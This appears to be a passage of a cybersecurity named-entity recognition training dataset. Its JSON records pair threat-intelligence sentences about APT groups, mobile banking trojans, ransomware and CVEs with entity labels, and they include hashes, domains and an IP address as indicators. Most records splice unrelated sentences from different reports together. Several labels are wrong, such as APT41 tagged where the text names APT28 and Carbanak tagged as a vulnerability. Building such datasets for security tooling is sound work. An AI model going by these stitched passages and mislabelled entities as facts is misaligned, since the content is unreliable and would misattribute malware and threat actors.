Finally , the use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlight APT28 's ability and interest in exploiting geopolitical events for their operations .", "spans": {"THREAT_ACTOR: APT41": [[142, 147]], "ORGANIZATION: military": [[413, 421]], "THREAT_ACTOR: APT28": [[481, 486]], "ORGANIZATION: geopolitical": [[525, 537]]}, "info": {"id": "cyberner_stix_train_005179", "source": "cyberner_stix_train"}} {"text": "TrickMo ’ s Persistence Capabilities When it comes to Android-based devices , many applications must find a way to run on the device after a system reboot . The group also uses the SQL injection (SQLi) tools Havij Advanced SQL Injection Tool and SQLi Dumper version 7.0 (Figure 4) to scan for and exploit vulnerabilities in targeted eCommerce sites . In the past , we had primarily associated the OilRig campaign with using the Clayslide documents to deliver as a payload a Trojan we named Helminth ; in this instance , the payload was instead a variant of the ISMDoor Trojan with significant modifications which we are now tracking as ISMAgent .", "spans": {"MALWARE: TrickMo": [[0, 7]], "SYSTEM: Android-based": [[54, 67]], "THREAT_ACTOR: group": [[161, 166]], "TOOL: SQL injection": [[181, 194]], "MALWARE: Clayslide documents": [[428, 447]], "MALWARE: Trojan": [[474, 480]], "MALWARE: Helminth": [[490, 498]], "MALWARE: ISMDoor Trojan": [[561, 575]], "MALWARE: ISMAgent": [[636, 644]]}, "info": {"id": "cyberner_stix_train_005180", "source": "cyberner_stix_train"}} {"text": "10001580: Init 10001620: InternetExchange 10001650: SendData This external library implements a simple Wininet-based transport for the main module .", "spans": {}, "info": {"id": "cyberner_stix_train_005181", "source": "cyberner_stix_train"}} {"text": "Figure 6 . 
ScarCruft has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe . If the victim appears valuable to the attackers , a GRIFFON implant installer is pushed to the victim’s workstation . Cisco Talos researchers recently discovered Greatness , one of the most advanced phishing - as - a - service tools ever seen in the wild .", "spans": {"THREAT_ACTOR: ScarCruft": [[11, 20]], "ORGANIZATION: business sector": [[90, 105]], "ORGANIZATION: diplomatic agencies": [[162, 181]], "MALWARE: GRIFFON": [[253, 260]], "TOOL: installer": [[269, 278]], "ORGANIZATION: Cisco Talos researchers": [[319, 342]], "TOOL: Greatness": [[363, 372]], "THREAT_ACTOR: phishing - as - a - service tools": [[400, 433]]}, "info": {"id": "cyberner_stix_train_005182", "source": "cyberner_stix_train"}} {"text": "Once executed , the module attempts to get root privileges on the device by exploiting the following vulnerabilities : CVE-2013-2094 CVE-2013-2595 CVE-2013-6282 CVE-2014-3153 ( futex aka TowelRoot ) CVE-2015-3636 Exploitation process After an in-depth look , we found that the exploit payload code shares several similarities with the public project android-rooting-tools . The last process is utilized as part of the loading process for Cotx RAT and involves the legitimate Symantec binary noted above . 
Turla : Waterbug , WhiteBear , VENOMOUS BEAR , Snake , Krypton .", "spans": {"VULNERABILITY: CVE-2013-2094": [[119, 132]], "VULNERABILITY: CVE-2013-2595": [[133, 146]], "VULNERABILITY: CVE-2013-6282": [[147, 160]], "VULNERABILITY: CVE-2014-3153": [[161, 174]], "VULNERABILITY: futex": [[177, 182]], "VULNERABILITY: TowelRoot": [[187, 196]], "VULNERABILITY: CVE-2015-3636": [[199, 212]], "THREAT_ACTOR: Cotx RAT": [[438, 446]], "ORGANIZATION: Symantec": [[475, 483]], "THREAT_ACTOR: Turla": [[505, 510]], "THREAT_ACTOR: Waterbug": [[513, 521]], "THREAT_ACTOR: WhiteBear": [[524, 533]], "THREAT_ACTOR: VENOMOUS BEAR": [[536, 549]], "THREAT_ACTOR: Snake": [[552, 557]], "THREAT_ACTOR: Krypton": [[560, 567]]}, "info": {"id": "cyberner_stix_train_005183", "source": "cyberner_stix_train"}} {"text": "The following screenshots show what type of information is collected in both steps of the overlay attack : Ginp overlaysGinp overlaysGinp overlaysGinp overlays Based on Anubis Once the Anubis bot code got leaked , it was just a matter of time before new banking Trojans based on Anubis would surface . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . 
We examined the sample described in the report as Hdoor and found it ’s a previous version of the NamelessHdoor we discovered in the Minzen sample , but without support for DLL injection .", "spans": {"MALWARE: Ginp": [[107, 111]], "MALWARE: Anubis": [[169, 175], [185, 191], [279, 285]], "MALWARE: sample": [[307, 313]], "MALWARE: Trochilus": [[333, 342]], "MALWARE: Hdoor": [[602, 607]], "MALWARE: NamelessHdoor": [[650, 663]], "TOOL: DLL": [[725, 728]]}, "info": {"id": "cyberner_stix_train_005184", "source": "cyberner_stix_train"}} {"text": "In this case , like others before , the event of a popular game release became an opportunity to trick unsuspecting users into downloading the RAT . The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . 3.doc : d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48 . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked “ exploitation more likely . 
”", "spans": {"THREAT_ACTOR: APT actor": [[153, 162]], "ORGANIZATION: organizations": [[209, 222]], "ORGANIZATION: financial services": [[230, 248]], "ORGANIZATION: telecoms": [[251, 259]], "ORGANIZATION: government": [[262, 272]], "ORGANIZATION: defense sectors": [[279, 294]], "FILEPATH: 3.doc": [[297, 302]], "FILEPATH: d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48": [[305, 369]], "VULNERABILITY: CVE-2022 - 41080": [[385, 401]], "VULNERABILITY: CVE-2022 - 41040": [[476, 492]]}, "info": {"id": "cyberner_stix_train_005185", "source": "cyberner_stix_train"}} {"text": "Meanwhile in early-to-mid 2017 , SPLM / CHOPSTICK / XAgent detections in Central Asia provided a glimpse into ongoing focus on ex-Soviet republics in Central Asia .", "spans": {"MALWARE: SPLM": [[33, 37]], "MALWARE: CHOPSTICK": [[40, 49]], "MALWARE: XAgent": [[52, 58]]}, "info": {"id": "cyberner_stix_train_005186", "source": "cyberner_stix_train"}} {"text": "This technique makes use of debuggers and software breakpoints useless . Organizations in the government , energy , and technology sectors have been targeted by Magic Hound , specifically organizations based in or doing business in Saudi Arabia . While continuing to monitor activity of the OceanLotus APT Group , BlackBerry Cylance researchers uncovered a novel payload loader that utilizes steganography to read an encrypted payload concealed within a .png image file . 
An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": {"ORGANIZATION: government": [[94, 104]], "ORGANIZATION: energy": [[107, 113]], "ORGANIZATION: technology sectors": [[120, 138]], "THREAT_ACTOR: OceanLotus": [[291, 301]], "ORGANIZATION: BlackBerry Cylance": [[314, 332]]}, "info": {"id": "cyberner_stix_train_005187", "source": "cyberner_stix_train"}} {"text": "DNS queries distribution over time The campaign does n't seem to be growing at a fast pace . The 13th FYP was released in March 2016 and the sectors and organisations known to be targeted by APT10 are broadly in line with the strategic aims documented in this plan . OceanLotus : SOFTWARE\\App\\AppX06c7130ad61f4f60b50394b8cba3d35f\\Applicationz 7244 . Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns ( e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s ) ) .", "spans": {"THREAT_ACTOR: APT10": [[191, 196]], "THREAT_ACTOR: OceanLotus": [[267, 277]], "TOOL: SOFTWARE\\App\\AppX06c7130ad61f4f60b50394b8cba3d35f\\Applicationz": [[280, 342]]}, "info": {"id": "cyberner_stix_train_005188", "source": "cyberner_stix_train"}} {"text": "It spreads under the name AvitoPay.apk ( or similar ) and downloads from websites with names like youla9d6h.tk , prodam8n9.tk , prodamfkz.ml , avitoe0ys.tk , etc . 
Carbanak is a backdoor used by the attackers to compromise the victim . We analyzed a new RATANKBA variant ( BKDR_RATANKBA.ZAEL–A ) , discovered in June 2017 , that uses a PowerShell script instead of its more traditional PE executable form—a version that other researchers also recently identified .", "spans": {"MALWARE: Carbanak": [[164, 172]], "TOOL: backdoor": [[178, 186]], "THREAT_ACTOR: attackers": [[199, 208]], "MALWARE: RATANKBA": [[254, 262]], "MALWARE: BKDR_RATANKBA.ZAEL–A": [[273, 293]], "MALWARE: PowerShell script": [[336, 353]]}, "info": {"id": "cyberner_stix_train_005189", "source": "cyberner_stix_train"}} {"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll – it should be pointed though that the filenames used by the Lamberts are generally unique and have never been used twice .", "spans": {"MALWARE: Microsoft Word attachment": [[84, 109]], "VULNERABILITY: CVE-2017-0199": [[142, 155]], "TOOL: ZeroT Trojan": [[170, 182]], "TOOL: PlugX Remote Access Trojan": [[214, 240]], "TOOL: RAT": [[243, 246]], "MALWARE: Gray Lambert": [[283, 295]], "MALWARE: mwapi32.dll": [[300, 311]], "MALWARE: poolstr.dll": [[316, 327]], "MALWARE: Lamberts": [[389, 397]]}, "info": {"id": "cyberner_stix_train_005190", "source": "cyberner_stix_train"}} {"text": "In the case of CVE-2010-0232 , the exploit appears to be based directly on the proof of concept code published by security researcher Tavis Ormandy when he disclosed the vulnerability .", "spans": {"VULNERABILITY: CVE-2010-0232": [[15, 28]]}, "info": {"id": "cyberner_stix_train_005191", "source": "cyberner_stix_train"}} {"text": "The group attempted to deploy this spearphish attachment to push a small 30kb backdoor known as GAMEFISH to targets 
in Europe at the beginning of 2017 .", "spans": {"MALWARE: GAMEFISH": [[96, 104]]}, "info": {"id": "cyberner_stix_train_005192", "source": "cyberner_stix_train"}} {"text": "This does however still rule out the possibility that the Dukes simply obtained copies of the exploit binaries described by FireEye and repurposed them .", "spans": {"THREAT_ACTOR: Dukes": [[58, 63]], "ORGANIZATION: FireEye": [[124, 131]]}, "info": {"id": "cyberner_stix_train_005193", "source": "cyberner_stix_train"}} {"text": "According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors .", "spans": {"ORGANIZATION: FireEye": [[13, 20]], "THREAT_ACTOR: admin@338": [[27, 36]], "VULNERABILITY: Microsoft Office vulnerabilities": [[104, 136]], "TOOL: LOWBALL": [[187, 194]], "FILEPATH: documents": [[201, 210]], "VULNERABILITY: CVE-2012-0158": [[294, 307]], "TOOL: Microsoft Word": [[363, 377]], "VULNERABILITY: vulnerabilities": [[378, 393]]}, "info": {"id": "cyberner_stix_train_005194", "source": "cyberner_stix_train"}} {"text": "Figure 6 : bit.ly statistics for the fake Bank Austria Android app download link From this small sample , we see that 7 % of visitors clicked through to download the application , which is actually a version of the Marcher banking Trojan named “ BankAustria.apk ” , continuing the fraudulent use of the bank ’ s branding to fool potential victims . The threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials . 
APT3 is a China based threat group that researchers have attributed to China's Ministry of StateSecurity .", "spans": {"SYSTEM: Bank Austria Android app": [[42, 66]], "MALWARE: Marcher banking Trojan": [[215, 237]], "THREAT_ACTOR: threat actors": [[353, 366]], "THREAT_ACTOR: APT3": [[482, 486]], "ORGANIZATION: China's Ministry of StateSecurity": [[553, 586]]}, "info": {"id": "cyberner_stix_train_005195", "source": "cyberner_stix_train"}} {"text": "To overcome this issue , “ Agent Smith ” found another solution . The first encounter with Buhtrap was registered back in 2014 . If the process is not halted , Dexphot decompresses the password-protected ZIP archive from the MSI package . However , the template source code is quite different and the payload delivery uses different infrastructure .", "spans": {"MALWARE: Agent Smith": [[27, 38]], "MALWARE: Dexphot": [[160, 167]], "TOOL: MSI": [[225, 228]]}, "info": {"id": "cyberner_stix_train_005197", "source": "cyberner_stix_train"}} {"text": "TG-3390 : apigmail.com .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "DOMAIN: apigmail.com": [[10, 22]]}, "info": {"id": "cyberner_stix_train_005198", "source": "cyberner_stix_train"}} {"text": "HenBox has ties to infrastructure used in targeted attacks with a focus on politics in South East Asia . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository . 
Researchers have pointed out that it is not uncommon for admin@338 to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement .", "spans": {"MALWARE: HenBox": [[0, 6]], "MALWARE: MSIL dropper": [[176, 188]], "ORGANIZATION: Proofpoint": [[215, 225]], "THREAT_ACTOR: admin@338": [[328, 337]], "ORGANIZATION: media organizations": [[358, 377]]}, "info": {"id": "cyberner_stix_train_005199", "source": "cyberner_stix_train"}} {"text": "Something that makes Ginp special is that all of its overlay screens for banking apps are consist of multiple steps , first stealing the victim ’ s login credentials , then stealing the credit card details ( to “ validate ” the user identity ) , as shown in the screenshots hereafter : The following code snippet shows that after the second overlay is filled-in and validated , it disappears and the targeted application is added to the list of packages names to be ignored for future overlays attacks . Recorded Future’s Insikt Group has actively tracked APT10 for several years , focusing specifically on the group’s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . The oldest code we could identify was hosted on a famous Chinese source code sharing site since 2005 .", "spans": {"MALWARE: Ginp": [[21, 25]], "ORGANIZATION: Recorded Future’s": [[504, 521]], "ORGANIZATION: MSPs": [[632, 636]], "ORGANIZATION: infrastructure providers": [[657, 681]]}, "info": {"id": "cyberner_stix_train_005200", "source": "cyberner_stix_train"}} {"text": "SuperService also tracks its own status and relaunches if stopped . The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon . 
The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April .", "spans": {"MALWARE: .exe file": [[92, 101]], "MALWARE: Microsoft Word file": [[129, 148]], "TOOL: SMBv1": [[239, 244]], "VULNERABILITY: exploit": [[245, 252]], "THREAT_ACTOR: Shadow Brokers": [[296, 310]]}, "info": {"id": "cyberner_stix_train_005201", "source": "cyberner_stix_train"}} {"text": "The njRAT used in this cyber attack was built from this builder kit .", "spans": {"MALWARE: njRAT": [[4, 9]]}, "info": {"id": "cyberner_stix_train_005202", "source": "cyberner_stix_train"}} {"text": "The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . The primary backdoor used in the Epic attacks is also known as \" WorldCupSec \" , \" TadjMakhal \" , \" Wipbot \" or \" Tavdig \" .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: Daserf malware": [[92, 106]], "VULNERABILITY: Flash exploits": [[132, 146]], "THREAT_ACTOR: WorldCupSec": [[230, 241]], "THREAT_ACTOR: TadjMakhal": [[248, 258]], "THREAT_ACTOR: Wipbot": [[265, 271]], "THREAT_ACTOR: Tavdig": [[279, 285]]}, "info": {"id": "cyberner_stix_train_005203", "source": "cyberner_stix_train"}} {"text": "The new text ( in Chinese , about relations between China , Japan and the disputed “ Senkaku Islands / Diaoyudao Islands / Diaoyutai Islands ” ) is shown to the victims and reads as following : When opened in a browser , this is what the command-and-control index page looks like : The text on the top means “ Title Title Title ” in Chinese , while the other strings appear to be random characters typed from the keyboard . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . 
All 13 countries where Kaspersky reportedly observed BlackOasis activity are connected to Saudi Arabia in one of three ACTs : economically ; from a national security perspective ; or due to established policy agreements .", "spans": {"MALWARE: document": [[431, 439]], "VULNERABILITY: CVE-2012-0158": [[488, 501]], "VULNERABILITY: CVE-2013-3906": [[504, 517]], "VULNERABILITY: CVE-2014-1761": [[521, 534]], "ORGANIZATION: Kaspersky": [[625, 634]]}, "info": {"id": "cyberner_stix_train_005204", "source": "cyberner_stix_train"}} {"text": "We found get.adobe.go-microstf.com hosted at 104.218.120.128 around the time this campaign was ongoing , November 2016 .", "spans": {"DOMAIN: get.adobe.go-microstf.com": [[9, 34]], "IP_ADDRESS: 104.218.120.128": [[45, 60]]}, "info": {"id": "cyberner_stix_train_005205", "source": "cyberner_stix_train"}} {"text": "The admin@338 started targeting Hong Kong media companies , probably in response to political and economic challenges in Hong Kong and China . he Trojan , a hybrid of Nymaim and Gozi malware , initially formed in April and thrives on carrying out redirection attacks via DNS poisoning .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "ORGANIZATION: media companies": [[42, 57]], "ORGANIZATION: political": [[84, 93]], "ORGANIZATION: economic": [[98, 106]], "MALWARE: Trojan": [[146, 152]], "MALWARE: Nymaim": [[167, 173]], "MALWARE: Gozi": [[178, 182]], "MALWARE: malware": [[183, 190]]}, "info": {"id": "cyberner_stix_train_005206", "source": "cyberner_stix_train"}} {"text": "The executable file , xxxx.exe in this case , is then executed .", "spans": {"FILEPATH: xxxx.exe": [[22, 30]]}, "info": {"id": "cyberner_stix_train_005207", "source": "cyberner_stix_train"}} {"text": "Once started , the code in the main thread resolves the basic API functions it needs and loads an additional library from the following location : “ %TEMP%\\tf394kv.dll ” .", "spans": {"FILEPATH: %TEMP%\\tf394kv.dll": [[149, 167]]}, "info": {"id": 
"cyberner_stix_train_005208", "source": "cyberner_stix_train"}} {"text": "A few days back , we wrote about an Android Marcher trojan variant posing as the Super Mario Run game for Android . The admin@338 started targeting Hong Kong media companies , probably in response to political and economic challenges in Hong Kong and China . Morphisec researchers began investigating the attacks on April 24 and continue to uncover more details . As we commonly see in the ransomware space , this threat is delivered through a variety of mechanisms which can include phishing and being dropped as secondary payloads from command and control ( C2 ) frameworks like Cobalt Strike .", "spans": {"SYSTEM: Android": [[36, 43], [106, 113]], "MALWARE: Marcher": [[44, 51]], "SYSTEM: Super Mario Run": [[81, 96]], "THREAT_ACTOR: admin@338": [[120, 129]], "ORGANIZATION: media companies": [[158, 173]], "ORGANIZATION: political and economic challenges": [[200, 233]], "ORGANIZATION: Morphisec researchers": [[259, 280]], "SYSTEM: control ( C2 ) frameworks": [[550, 575]], "SYSTEM: Cobalt Strike": [[581, 594]]}, "info": {"id": "cyberner_stix_train_005209", "source": "cyberner_stix_train"}} {"text": "Threat actors continue to exploit the CVE-2019-0604 vulnerability to compromise SharePoint servers , which is a vulnerability that Microsoft released a patch for in March 2019 .", "spans": {"VULNERABILITY: CVE-2019-0604": [[38, 51]], "TOOL: SharePoint": [[80, 90]], "ORGANIZATION: Microsoft": [[131, 140]]}, "info": {"id": "cyberner_stix_train_005210", "source": "cyberner_stix_train"}} {"text": "A buffer overflow vulnerability exists in Adobe Flash Player ( <=17.0.0.134 ) when parsing malformed FLV objects .", "spans": {"TOOL: Adobe Flash Player": [[42, 60]], "TOOL: FLV": [[101, 104]]}, "info": {"id": "cyberner_stix_train_005211", "source": "cyberner_stix_train"}} {"text": "The malware simulates clicks on app advertisements provided by legitimate ad networks and forces the app to install on a device . 
APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns . the pattern matching function replaces dword_745BB58C * ( dword_745BB58C – 1 ) Investigate anomalous activity and correlate findings with process telemetry .", "spans": {"THREAT_ACTOR: APT39": [[130, 135]], "ORGANIZATION: telecommunications and travel industries": [[152, 192]], "ORGANIZATION: specific individuals": [[279, 299]]}, "info": {"id": "cyberner_stix_train_005212", "source": "cyberner_stix_train"}} {"text": "Chunghwa Post - The government-owned corporation Chunghwa is the official postal service of Taiwan . Since late March , suspected APT33 threat actors have continued to use a large swath of operational infrastructure , well in excess of 1 , 200 domains , with many observed communicating with 19 different commodity RAT implants . The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques .", "spans": {"ORGANIZATION: Chunghwa Post": [[0, 13]], "ORGANIZATION: Chunghwa": [[49, 57]], "THREAT_ACTOR: APT33": [[130, 135]], "TOOL: RAT": [[315, 318]], "THREAT_ACTOR: GCMAN group": [[334, 345]], "ORGANIZATION: banks": [[363, 368]], "ORGANIZATION: budgeting": [[394, 403]], "ORGANIZATION: accounting departments": [[408, 430]]}, "info": {"id": "cyberner_stix_train_005213", "source": "cyberner_stix_train"}} {"text": "Targeting antivirus companies appears to have been the primary goal of Fxmps' latest network intrusions . 
The PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) .", "spans": {"ORGANIZATION: antivirus companies": [[10, 29]], "THREAT_ACTOR: PassCV group": [[110, 122]], "MALWARE: RATs": [[161, 165]]}, "info": {"id": "cyberner_stix_train_005214", "source": "cyberner_stix_train"}} {"text": "This indicates that the authors are trying to hide some messages showed by the system during the setup process . The resume contained the PupyRAT backdoor , which communicated with known APT35 infrastructure . Performing the same steps in CyberChef , it is possible to decode the encrypted payload , which should yield x86 shellcode , starting with a call immediate opcode sequence . If the main function is called with only , it will only perform its cleanup routine and immediately terminate .", "spans": {"TOOL: PupyRAT backdoor": [[138, 154]], "THREAT_ACTOR: APT35": [[187, 192]], "TOOL: CyberChef": [[239, 248]]}, "info": {"id": "cyberner_stix_train_005215", "source": "cyberner_stix_train"}} {"text": "] 205 [ . The Dukes actively targeted Ukraine before the crisis , at a time when Russia was still weighing her options , but once Russia moved from diplomacy to direct action , Ukraine was no longer relevant to the Dukes in the same way . It should be noted that the contents of o402ek2m.php were updated by the attackers to reference different pastebin uploads throughout this campaign . 
JumpCloud confirmed the commands framework was used for malicious data injections in their security incident disclosure .", "spans": {"THREAT_ACTOR: Dukes": [[14, 19], [215, 220]], "FILEPATH: o402ek2m.php": [[279, 291]]}, "info": {"id": "cyberner_stix_train_005216", "source": "cyberner_stix_train"}} {"text": "We were also able to find a related webshell based on the threat group ’s tool reuse , specifically a custom Mimikatz sample .", "spans": {"TOOL: Mimikatz": [[109, 117]]}, "info": {"id": "cyberner_stix_train_005217", "source": "cyberner_stix_train"}} {"text": "For example , when a button is clicked , a view is focused , etc . The second group , known as DragonOK , targets high-tech and manufacturing companies in Japan and Taiwan . ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip . Umbrella , Cisco ’s secure internet gateway ( SIG ) , blocks users from connecting to malicious domains , IPs and URLs , whether users are on or off the corporate network .", "spans": {"THREAT_ACTOR: group": [[78, 83]], "THREAT_ACTOR: DragonOK": [[95, 103]], "ORGANIZATION: high-tech": [[114, 123]], "ORGANIZATION: manufacturing companies": [[128, 151]], "THREAT_ACTOR: ShadowHammer": [[174, 186]], "URL: https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip": [[189, 283]], "TOOL: Umbrella": [[286, 294]], "TOOL: Cisco ’s secure internet gateway ( SIG )": [[297, 337]]}, "info": {"id": "cyberner_stix_train_005218", "source": "cyberner_stix_train"}} {"text": "The number at the end of the password corresponds to the year of the intrusion .", "spans": {}, "info": {"id": "cyberner_stix_train_005219", "source": "cyberner_stix_train"}} {"text": "However , his study results are out of the scope of our research . The malware appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD (via Bitcoin) to decrypt the data . 
SHA256 : 94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5 .", "spans": {"MALWARE: malware": [[71, 78]], "MALWARE: .WCRY extension": [[117, 132]], "FILEPATH: 94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5": [[247, 311]]}, "info": {"id": "cyberner_stix_train_005220", "source": "cyberner_stix_train"}} {"text": "Lookout Discovers Phishing Sites Distributing New IOS And Android Surveillanceware April 8 , 2019 For the past year , Lookout researchers have been tracking Android and iOS surveillanceware , that can exfiltrate contacts , audio recordings , photos , location , and more from devices . Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa . Over the past year , we've seen the group extensively targeting a wide gamut of entities in various sectors , including Governments , Academy , Crypto-Currency , Telecommunications and the Oil sectors .", "spans": {"ORGANIZATION: Lookout": [[0, 7], [118, 125]], "SYSTEM: IOS": [[50, 53]], "SYSTEM: Android": [[58, 65], [157, 164]], "MALWARE: Surveillanceware": [[66, 82]], "SYSTEM: iOS": [[169, 172]], "MALWARE: surveillanceware": [[173, 189]], "VULNERABILITY: Carbanak": [[324, 332]], "THREAT_ACTOR: attackers": [[333, 342]], "ORGANIZATION: Governments": [[578, 589]], "ORGANIZATION: Academy": [[592, 599]], "ORGANIZATION: Crypto-Currency": [[602, 617]], "ORGANIZATION: Telecommunications": [[620, 638]], "ORGANIZATION: Oil sectors": [[647, 658]]}, "info": {"id": "cyberner_stix_train_005221", "source": "cyberner_stix_train"}} {"text": "The report authors renamed the malware \" FriedEx \" . 
ScarCruft has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe .", "spans": {"TOOL: FriedEx": [[41, 48]], "THREAT_ACTOR: ScarCruft": [[53, 62]], "ORGANIZATION: business sector": [[132, 147]], "ORGANIZATION: diplomatic agencies": [[204, 223]]}, "info": {"id": "cyberner_stix_train_005222", "source": "cyberner_stix_train"}} {"text": "Figure 11 . We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . SHA256 : 69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0 .", "spans": {"MALWARE: them": [[34, 38]], "FILEPATH: 69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0": [[184, 248]]}, "info": {"id": "cyberner_stix_train_005223", "source": "cyberner_stix_train"}} {"text": "Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "VULNERABILITY: flash exploit": [[96, 109]], "VULNERABILITY: CVE-2015-5119": [[112, 125]], "ORGANIZATION: Department of Homeland Security": [[250, 281]]}, "info": {"id": "cyberner_stix_train_005224", "source": "cyberner_stix_train"}} {"text": "If a typical user tries to get rid of the malicious app , chances are that only the shortcut ends up getting removed . However , the unique malware variant , BlackEnergy 3 , reemerged in Ukraine early in 2015 , where we had first found Sandworm Team . 
The RAT has remained under the Radar for multiple years .", "spans": {"MALWARE: BlackEnergy 3": [[158, 171]], "THREAT_ACTOR: Sandworm Team": [[236, 249]], "TOOL: Radar": [[283, 288]]}, "info": {"id": "cyberner_stix_train_005225", "source": "cyberner_stix_train"}} {"text": "While analyzing a campaign run by the Gamaredon group , FortiGuard Labs discovered the tools they used to prepare the attack and found artifacts left behind by the actors that allowed us to perform a large amount of forensic analysis . The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 ( EternalBlue ) that we saw uploaded to the other errr.aspx webshell . According to Microsoft’s advisory , this vulnerability was patched on March 12 , 2019 and we first saw the webshell activity on April 1 , 2019 . We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 ( EternalBlue ) vulnerability patched in MS17-010 . Once the adversary established a foothold on the targeted network , they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials , perform network reconnaissance and pivot to other systems . We also observed Emissary Panda uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft’s Create Media application , both of which we had never seen used for DLL sideloading before . Consequently , the Linux malware ecosystem is plagued by financial driven crypto-miners and DDoS botnet tools which mostly target vulnerable servers . 
We also observed the actors uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft’s Create Media application , both of which we had never seen used for DLL sideloading before . It has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government . The group’s implants are characterized by the employment of information stealing tools among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . The finding shows that EvilGnome operates on an IP address that was controlled by the Gamaredon group two months ago . FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015 . The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year . In addition , during the investigation , we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations . In 2018-2019 , researchers of Kaspersky Lab’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests . One of the domains used by FIN7 in their 2018 campaign of spear phishing contained more than 130 email APTes , leading us to think that more than 130 companies had been targeted by the end of 2018 . Interestingly , following some open-source publications about them , the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit , which they employed during the summer of 2018 . 
